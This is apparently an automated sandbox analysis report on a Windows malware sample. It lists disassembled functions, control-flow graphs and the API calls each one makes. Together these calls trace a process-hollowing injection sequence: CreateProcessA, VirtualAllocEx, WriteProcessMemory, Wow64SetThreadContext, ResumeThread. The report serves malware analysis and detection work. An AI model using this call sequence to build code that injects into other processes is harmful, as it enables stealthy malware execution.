25655 22b83f4 25639->25655 25644 22b851f 25643->25644 25644->25643 25646 22b8505 25644->25646 25675 22b6b58 25644->25675 25679 22b6b51 25644->25679 25683 22b6760 25644->25683 25687 22b6759 25644->25687 25691 22b66a9 25644->25691 25695 22b66b0 25644->25695 25645 22b83c6 25645->25642 25646->25645 25647 22b6b58 WriteProcessMemory 25646->25647 25648 22b6b51 WriteProcessMemory 25646->25648 25647->25646 25648->25646 25699 22b6de0 25655->25699 25703 22b6dd4 25655->25703 25656 22b8428 25661 22b8500 25656->25661 25673 22b6759 Wow64SetThreadContext 25656->25673 25674 22b6760 Wow64SetThreadContext 25656->25674 25657 22b848b 25657->25661 25662 22b6c48 ReadProcessMemory 25657->25662 25663 22b6c41 ReadProcessMemory 25657->25663 25658 22b86e2 25658->25642 25659 22b84d0 25659->25661 25664 22b6828 VirtualAllocEx 25659->25664 25665 22b6838 VirtualAllocEx 25659->25665 25666 22b6a90 VirtualAllocEx 25659->25666 25660 22b873e 25660->25661 25671 22b6b58 WriteProcessMemory 25660->25671 25672 22b6b51 WriteProcessMemory 25660->25672 25661->25658 25667 22b6b58 WriteProcessMemory 25661->25667 25668 22b6b51 WriteProcessMemory 25661->25668 25662->25659 25663->25659 25664->25660 25665->25660 25666->25660 25667->25661 25668->25661 25671->25661 25672->25661 25673->25657 25674->25657 25676 22b6ba0 WriteProcessMemory 25675->25676 25678 22b6bf7 25676->25678 25678->25644 25680 22b6ba0 WriteProcessMemory 25679->25680 25682 22b6bf7 25680->25682 25682->25644 25684 22b67a5 Wow64SetThreadContext 25683->25684 25686 22b67ed 25684->25686 25686->25644 25688 22b67a5 Wow64SetThreadContext 25687->25688 25690 22b67ed 25688->25690 25690->25644 25692 22b66f0 ResumeThread 25691->25692 25694 22b6721 25692->25694 25694->25644 25696 22b66f0 ResumeThread 25695->25696 25698 22b6721 25696->25698 25698->25644 25700 22b6e69 25699->25700 25700->25700 25701 22b6fce CreateProcessA 25700->25701 25702 22b702b 25701->25702 25704 22b6e69 25703->25704 25704->25704 25705 22b6fce CreateProcessA 25704->25705 25706 22b702b 25705->25706 25706->25706

                                                                                                Executed Functions

                                                                                                Function 0231D0A9 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 294 231d0a9-231d147 GetCurrentProcess 298 231d150-231d184 GetCurrentThread 294->298 299 231d149-231d14f 294->299 300 231d186-231d18c 298->300 301 231d18d-231d1c1 GetCurrentProcess 298->301 299->298 300->301 302 231d1c3-231d1c9 301->302 303 231d1ca-231d1e5 call 231d287 301->303 302->303 307 231d1eb-231d21a GetCurrentThreadId 303->307 308 231d223-231d285 307->308 309 231d21c-231d222 307->309 309->308
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0231D136
                                                                                                • GetCurrentThread.KERNEL32 ref: 0231D173
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0231D1B0
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0231D209
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: 7a5db8680c611b7813794ff34645ff4dc1ade0b54bcd4eb282e529bb19b0c21e
                                                                                                • Instruction ID: fe004f14cf629669cbb5380b8b473d911dd9c0b7d6f2e95076b0990ac64e99d7
                                                                                                • Opcode Fuzzy Hash: 7a5db8680c611b7813794ff34645ff4dc1ade0b54bcd4eb282e529bb19b0c21e
                                                                                                • Instruction Fuzzy Hash: 595176B0900349CFDB58DFAAD948B9EBFF1EF48314F248469E419A7360D734A845CB65
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0231D0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 316 231d0b8-231d147 GetCurrentProcess 320 231d150-231d184 GetCurrentThread 316->320 321 231d149-231d14f 316->321 322 231d186-231d18c 320->322 323 231d18d-231d1c1 GetCurrentProcess 320->323 321->320 322->323 324 231d1c3-231d1c9 323->324 325 231d1ca-231d1e5 call 231d287 323->325 324->325 329 231d1eb-231d21a GetCurrentThreadId 325->329 330 231d223-231d285 329->330 331 231d21c-231d222 329->331 331->330
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0231D136
                                                                                                • GetCurrentThread.KERNEL32 ref: 0231D173
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0231D1B0
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0231D209
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: 3ac8094d2cb0892303c667e59d333110d2285c9908c690545b26c317458e0f3a
                                                                                                • Instruction ID: 76cefa9f9701635dfa82246840acfd3c0fd84e3940d7f0296d77ca070af4cb64
                                                                                                • Opcode Fuzzy Hash: 3ac8094d2cb0892303c667e59d333110d2285c9908c690545b26c317458e0f3a
                                                                                                • Instruction Fuzzy Hash: 9C5177B0900309CFDB58DFAAD948B9EBBF5EF48314F248469E419A7360D734A844CF65
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 022B6838 Relevance: 1.7, APIs: 1, Instructions: 249memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 706 22b6838-22b6867 707 22b690e-22b6910 706->707 708 22b686d-22b6883 706->708 711 22b695c-22b695f 707->711 712 22b6912-22b691a 707->712 709 22b6889-22b6891 708->709 710 22b6a7d-22b6b13 VirtualAllocEx 708->710 709->710 713 22b6897-22b68a7 709->713 733 22b6b1c-22b6b41 710->733 734 22b6b15-22b6b1b 710->734 714 22b6a75-22b6a7c 711->714 715 22b6965-22b697b 711->715 716 22b6928-22b694e 712->716 717 22b691c-22b691e 712->717 713->710 719 22b68ad-22b68ba 713->719 715->710 720 22b6981-22b6989 715->720 716->710 732 22b6954-22b6957 716->732 717->716 719->710 723 22b68c0-22b68d7 719->723 720->710 724 22b698f-22b699c 720->724 725 22b68d9-22b68dc 723->725 726 22b68de 723->726 724->710 727 22b69a2-22b69b2 724->727 730 22b68e0-22b6909 725->730 726->730 727->710 731 22b69b8-22b69d5 727->731 730->714 731->710 735 22b69db-22b69e3 731->735 732->714 734->733 735->710 737 22b69e9-22b69f9 735->737 737->710 740 22b69ff-22b6a0c 737->740 740->710 741 22b6a0e-22b6a25 740->741 743 22b6a2a-22b6a68 741->743 744 22b6a27 741->744 752 22b6a6a 743->752 753 22b6a6d 743->753 744->743 752->753 753->714
                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 022B6B06
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: a35348512d73a97b2a62b606bc4bccbd6f185986f76c08f506fce504318cdc94
                                                                                                • Instruction ID: 79bbdf275c34c34c0abf6c7ddd34262b36f0e7456730f911f461901ddb23e065
                                                                                                • Opcode Fuzzy Hash: a35348512d73a97b2a62b606bc4bccbd6f185986f76c08f506fce504318cdc94
                                                                                                • Instruction Fuzzy Hash: 5491D070A105258BCB09CF6DC8906BEFBFAEF89350B28C659D4699B259C774EC41CBD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 022B6DD4 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 754 22b6dd4-22b6e75 756 22b6eae-22b6ece 754->756 757 22b6e77-22b6e81 754->757 764 22b6ed0-22b6eda 756->764 765 22b6f07-22b6f36 756->765 757->756 758 22b6e83-22b6e85 757->758 759 22b6ea8-22b6eab 758->759 760 22b6e87-22b6e91 758->760 759->756 762 22b6e93 760->762 763 22b6e95-22b6ea4 760->763 762->763 763->763 766 22b6ea6 763->766 764->765 767 22b6edc-22b6ede 764->767 771 22b6f38-22b6f42 765->771 772 22b6f6f-22b7029 CreateProcessA 765->772 766->759 769 22b6f01-22b6f04 767->769 770 22b6ee0-22b6eea 767->770 769->765 773 22b6eee-22b6efd 770->773 774 22b6eec 770->774 771->772 776 22b6f44-22b6f46 771->776 785 22b702b-22b7031 772->785 786 22b7032-22b70b8 772->786 773->773 775 22b6eff 773->775 774->773 775->769 777 22b6f69-22b6f6c 776->777 778 22b6f48-22b6f52 776->778 777->772 780 22b6f56-22b6f65 778->780 781 22b6f54 778->781 780->780 783 22b6f67 780->783 781->780 783->777 785->786 796 22b70ba-22b70be 786->796 797 22b70c8-22b70cc 786->797 796->797 798 22b70c0 796->798 799 22b70ce-22b70d2 797->799 800 22b70dc-22b70e0 797->800 798->797 799->800 801 22b70d4 799->801 802 22b70e2-22b70e6 800->802 803 22b70f0-22b70f4 800->803 801->800 802->803 804 22b70e8 802->804 805 22b7106-22b710d 803->805 806 22b70f6-22b70fc 803->806 804->803 807 22b710f-22b711e 805->807 808 22b7124 805->808 806->805 807->808 810 22b7125 808->810 810->810
                                                                                                APIs
                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 022B7016
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 94c4e3aee9af686844c9c8e81af31520ed23680008f30c3f63ace56446aca2e8
                                                                                                • Instruction ID: e96ad9916030a2f806201cd4203dd7ec9bde94087e40e258eee61dd4a9adba80
                                                                                                • Opcode Fuzzy Hash: 94c4e3aee9af686844c9c8e81af31520ed23680008f30c3f63ace56446aca2e8
                                                                                                • Instruction Fuzzy Hash: 75A18D71D1021ACFEF25CFA8C841BEDBBB6BF48314F0485A9E809A7244DB749985CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 022B6DE0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 811 22b6de0-22b6e75 813 22b6eae-22b6ece 811->813 814 22b6e77-22b6e81 811->814 821 22b6ed0-22b6eda 813->821 822 22b6f07-22b6f36 813->822 814->813 815 22b6e83-22b6e85 814->815 816 22b6ea8-22b6eab 815->816 817 22b6e87-22b6e91 815->817 816->813 819 22b6e93 817->819 820 22b6e95-22b6ea4 817->820 819->820 820->820 823 22b6ea6 820->823 821->822 824 22b6edc-22b6ede 821->824 828 22b6f38-22b6f42 822->828 829 22b6f6f-22b7029 CreateProcessA 822->829 823->816 826 22b6f01-22b6f04 824->826 827 22b6ee0-22b6eea 824->827 826->822 830 22b6eee-22b6efd 827->830 831 22b6eec 827->831 828->829 833 22b6f44-22b6f46 828->833 842 22b702b-22b7031 829->842 843 22b7032-22b70b8 829->843 830->830 832 22b6eff 830->832 831->830 832->826 834 22b6f69-22b6f6c 833->834 835 22b6f48-22b6f52 833->835 834->829 837 22b6f56-22b6f65 835->837 838 22b6f54 835->838 837->837 840 22b6f67 837->840 838->837 840->834 842->843 853 22b70ba-22b70be 843->853 854 22b70c8-22b70cc 843->854 853->854 855 22b70c0 853->855 856 22b70ce-22b70d2 854->856 857 22b70dc-22b70e0 854->857 855->854 856->857 858 22b70d4 856->858 859 22b70e2-22b70e6 857->859 860 22b70f0-22b70f4 857->860 858->857 859->860 861 22b70e8 859->861 862 22b7106-22b710d 860->862 863 22b70f6-22b70fc 860->863 861->860 864 22b710f-22b711e 862->864 865 22b7124 862->865 863->862 864->865 867 22b7125 865->867 867->867
                                                                                                APIs
                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 022B7016
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: e9db2e6c88e5c4cd7d05b43de76fed67227036840a2ee05d0de6fa3796073f2a
                                                                                                • Instruction ID: 0b8f2a34f53000a8b280e1f2a02462192640defbbc9ab650e92bfb27b387e219
                                                                                                • Opcode Fuzzy Hash: e9db2e6c88e5c4cd7d05b43de76fed67227036840a2ee05d0de6fa3796073f2a
                                                                                                • Instruction Fuzzy Hash: 1B918E71D1021ACFEF25DFA8C840BEDBBB6BF48314F0485A9E809A7244DB759985CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0231AE30 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 868 231ae30-231ae3f 869 231ae41-231ae4e call 2319838 868->869 870 231ae6b-231ae6f 868->870 877 231ae50 869->877 878 231ae64 869->878 871 231ae71-231ae7b 870->871 872 231ae83-231aec4 870->872 871->872 879 231aed1-231aedf 872->879 880 231aec6-231aece 872->880 923 231ae56 call 231b0b8 877->923 924 231ae56 call 231b0c8 877->924 878->870 882 231aee1-231aee6 879->882 883 231af03-231af05 879->883 880->879 881 231ae5c-231ae5e 881->878 884 231afa0-231b060 881->884 886 231aef1 882->886 887 231aee8-231aeef call 231a814 882->887 885 231af08-231af0f 883->885 918 231b062-231b065 884->918 919 231b068-231b093 GetModuleHandleW 884->919 889 231af11-231af19 885->889 890 231af1c-231af23 885->890 888 231aef3-231af01 886->888 887->888 888->885 889->890 892 231af30-231af39 call 231a824 890->892 893 231af25-231af2d 890->893 899 231af46-231af4b 892->899 900 231af3b-231af43 892->900 893->892 901 231af69-231af6d 899->901 902 231af4d-231af54 899->902 900->899 905 231af73-231af76 901->905 902->901 904 231af56-231af66 call 231a834 call 231a844 902->904 904->901 908 231af99-231af9f 905->908 909 231af78-231af96 905->909 909->908 918->919 920 231b095-231b09b 919->920 921 231b09c-231b0b0 919->921 920->921 923->881 924->881
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0231B086
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: d5974befb9f79f705e4e15a842d69d4d60c415d6462b48f8a213d96209dccf3f
                                                                                                • Instruction ID: e5dc3c919d2c17044fb49bf490c300b1dffd0e7a54e3edee58208da38398bc0c
                                                                                                • Opcode Fuzzy Hash: d5974befb9f79f705e4e15a842d69d4d60c415d6462b48f8a213d96209dccf3f
                                                                                                • Instruction Fuzzy Hash: 6B7156B0A01B458FD728DF2AD44079ABBF2FF88314F10892DD08AD7A50D775E945CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0231590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 925 231590c-2315913 926 231591c-23159d9 CreateActCtxA 925->926 928 23159e2-2315a3c 926->928 929 23159db-23159e1 926->929 936 2315a4b-2315a4f 928->936 937 2315a3e-2315a41 928->937 929->928 938 2315a51-2315a5d 936->938 939 2315a60 936->939 937->936 938->939 941 2315a61 939->941 941->941
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 023159C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: ab1d574bf470667709f914ead054a49fd54cd343758c1147bb078850a7ea73ea
                                                                                                • Instruction ID: 3537044da8dd616782d8900c9c56b13abb5183857740a80303fea5e9f2f1c6fa
                                                                                                • Opcode Fuzzy Hash: ab1d574bf470667709f914ead054a49fd54cd343758c1147bb078850a7ea73ea
                                                                                                • Instruction Fuzzy Hash: F94102B0D00719CFDB24CFA9C884BCDBBB1BF88304F60806AD408AB251DB75694ACF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02314248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 942 2314248-23159d9 CreateActCtxA 945 23159e2-2315a3c 942->945 946 23159db-23159e1 942->946 953 2315a4b-2315a4f 945->953 954 2315a3e-2315a41 945->954 946->945 955 2315a51-2315a5d 953->955 956 2315a60 953->956 954->953 955->956 958 2315a61 956->958 958->958
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 023159C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: 45f4bd5f9acc9ddb2cc1ced0c50ba16986e9a15a96a7ba92994e5ad95299d240
                                                                                                • Instruction ID: 88b396547a40fb7612a06c3735f54dcf38b8fe886b11a74327b29d951eb599c1
                                                                                                • Opcode Fuzzy Hash: 45f4bd5f9acc9ddb2cc1ced0c50ba16986e9a15a96a7ba92994e5ad95299d240
                                                                                                • Instruction Fuzzy Hash: D941D2B0C00719CBDB24DFA9C884B9DBBF5BF88304F60856AD409AB251DB756949CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 022B6B51 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 959 22b6b51-22b6ba6 961 22b6ba8-22b6bb4 959->961 962 22b6bb6-22b6bf5 WriteProcessMemory 959->962 961->962 964 22b6bfe-22b6c2e 962->964 965 22b6bf7-22b6bfd 962->965 965->964
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 022B6BE8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: 8c29f36a22ca79c339110fc179d5fbe83f63db8a87a294e175f024b03ec7db3c
                                                                                                • Instruction ID: b404ca54e95729fb589c9072dda64a3a1e3b385f8c17c58a711f36f037113279
                                                                                                • Opcode Fuzzy Hash: 8c29f36a22ca79c339110fc179d5fbe83f63db8a87a294e175f024b03ec7db3c
                                                                                                • Instruction Fuzzy Hash: 482157B1910249DFDF10CFA9C981BEEBBF5FF48320F14882AE518A7250C7789941CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 022B6B58 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 969 22b6b58-22b6ba6 971 22b6ba8-22b6bb4 969->971 972 22b6bb6-22b6bf5 WriteProcessMemory 969->972 971->972 974 22b6bfe-22b6c2e 972->974 975 22b6bf7-22b6bfd 972->975 975->974
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 022B6BE8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: f332827b6760b0081ae48299ab7b251d9d2b2b372b3d4358a0cbc6d20bec5db8
                                                                                                • Instruction ID: f2ab74b93d85336b3bc1c6906997e599411a6d5f16687f4623eef0d5f895c1f5
                                                                                                • Opcode Fuzzy Hash: f332827b6760b0081ae48299ab7b251d9d2b2b372b3d4358a0cbc6d20bec5db8
                                                                                                • Instruction Fuzzy Hash: 76212775910349DFDB10CFA9C981BEEBBF5FF48324F148429E919A7240D7789944CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 022B6759 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 979 22b6759-22b67ab 981 22b67bb-22b67eb Wow64SetThreadContext 979->981 982 22b67ad-22b67b9 979->982 984 22b67ed-22b67f3 981->984 985 22b67f4-22b6824 981->985 982->981 984->985
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 022B67DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: e76b5458743123c9ac3305fb5fd3573798149f59f6fd5edfeaccf9df23b2a453
                                                                                                • Instruction ID: 31d9c9cf2c176a545e77609478f8b11cc4d659f560a8daa7d22e8170f1022678
                                                                                                • Opcode Fuzzy Hash: e76b5458743123c9ac3305fb5fd3573798149f59f6fd5edfeaccf9df23b2a453
                                                                                                • Instruction Fuzzy Hash: 23217CB1D102498FDB10CFAAC485BEEBBF5EF48324F148429D459A7241CB789945CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0231D2F8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0231D387
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: ee4d7c5fb29f0adcd46717d2d762d912e3e3cc887b373ceae8c39cc49594fdff
                                                                                                • Instruction ID: ba7cd66e30cf8eded4a4a9ac3a2835d51fcdc2a7da0d2b7b1459cd013c0190b2
                                                                                                • Opcode Fuzzy Hash: ee4d7c5fb29f0adcd46717d2d762d912e3e3cc887b373ceae8c39cc49594fdff
                                                                                                • Instruction Fuzzy Hash: CF2105B5900248DFDB10CF9AD885ADEBBF5EB48320F14841AE918A7250C378A941CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 022B6C41 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 022B6CC8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessRead
                                                                                                • String ID:
                                                                                                • API String ID: 1726664587-0
                                                                                                • Opcode ID: a30087dc96c2850a02f7e268c5a41342c1a2ec560ce49b9039937f6ac3ea8cbb
                                                                                                • Instruction ID: ff9bacde380d54c34e0fa1f9ac1dad93fc95f4072b854c6b4d8a2475caa559ee
                                                                                                • Opcode Fuzzy Hash: a30087dc96c2850a02f7e268c5a41342c1a2ec560ce49b9039937f6ac3ea8cbb
                                                                                                • Instruction Fuzzy Hash: 3F2139B1D10259DFDF10CFA9C945AEEBBF5FF48320F54882AE519A7250C7789904CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 022B6760 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 022B67DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: 967c750313f6350206f5e42fbc926273ec0af3cc0762839841753b8d0290c5d5
                                                                                                • Instruction ID: 071d730690129d68db7509b05d41c6a6b78b2497b0e2b2b7d230087a8befdba2
                                                                                                • Opcode Fuzzy Hash: 967c750313f6350206f5e42fbc926273ec0af3cc0762839841753b8d0290c5d5
                                                                                                • Instruction Fuzzy Hash: 6E215B71D103098FDB10DFAAC485BEEBBF9EF48364F148429D419A7241DB789944CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 022B6C48 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 022B6CC8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessRead
                                                                                                • String ID:
                                                                                                • API String ID: 1726664587-0
                                                                                                • Opcode ID: eec1a468c21d58b436a22a3a176fcc81630ffe03e5a35463691e77241a8c4777
                                                                                                • Instruction ID: 25a3709f7adc3d40f9d6adda24c5316fd7c3e8392b48014d0f8f177f04e109bc
                                                                                                • Opcode Fuzzy Hash: eec1a468c21d58b436a22a3a176fcc81630ffe03e5a35463691e77241a8c4777
                                                                                                • Instruction Fuzzy Hash: 952139B1D003599FDB10DFAAC944AEEFBF5FF48320F108429E518A7250C7799904CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0231D300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0231D387
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
